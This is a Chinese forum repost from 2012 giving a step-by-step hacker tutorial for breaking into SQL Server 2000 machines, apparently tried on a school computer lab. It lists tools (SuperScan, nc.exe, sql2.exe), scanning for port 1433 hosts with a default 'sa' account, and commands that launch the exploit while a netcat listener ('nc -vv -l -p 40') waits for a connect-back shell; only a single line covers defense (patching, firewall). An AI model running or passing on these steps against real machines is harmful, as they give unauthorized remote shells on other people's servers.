阳光网驿-企业信息化交流平台【DTC零售连锁全渠道解决方案】

 找回密码
 注册

QQ登录

只需一步,快速开始

扫描二维码登录本站

手机号码,快捷登录

手机号码,快捷登录

老司机
查看: 1191|回复: 0

[转帖] 详细攻击SQL服务器与防止

[复制链接]
  • TA的每日心情
    开心
    2012-3-7 10:15
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2012-1-9 10:53:16 | 显示全部楼层 |阅读模式
    先前已经写过一篇菜鸟黑客,有留意的朋友知道没图,现在本人在机房实战一下:
    我的学校机房有59台电脑(够我用的了)。
    首先,我们要有3个工具SuperScan和nc.exe与sql2.exe。3个东西,大部分网站可以下到,
    我们实战一下,打开SuperScan的扫描工具在中文版 下打开端口设置,进入后在左上角 写进1433的端口 :保存——返回——写进扫描地址`
    1133348245807.JPG
    上面是开了SQL SERVER 2000服务器的主机(因为SQL有个漏洞在默认是帐号为sa)


    好了,运行多一个CMD-——sql2 对方IP 自己IP 端口 版本(这是格式)(不要动先,先运行NC,看第2步操作)
    第2步,现在运行CMD-——nc -vv -l -p 40(打开并完整监听40端口,或者设置其他也可以,个人试过40 53 56 62 73 比较好攻击)
    详细看下图:

    1133348686503.JPG

    防范:必须更新SQL补丁。win2000机上装了mssql的话,机就会开1433端口的,所以 通过安装网络放火墙就一般可以防止。


    楼主热帖
    启用邀请码注册,提高发帖质量,建设交流社区
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表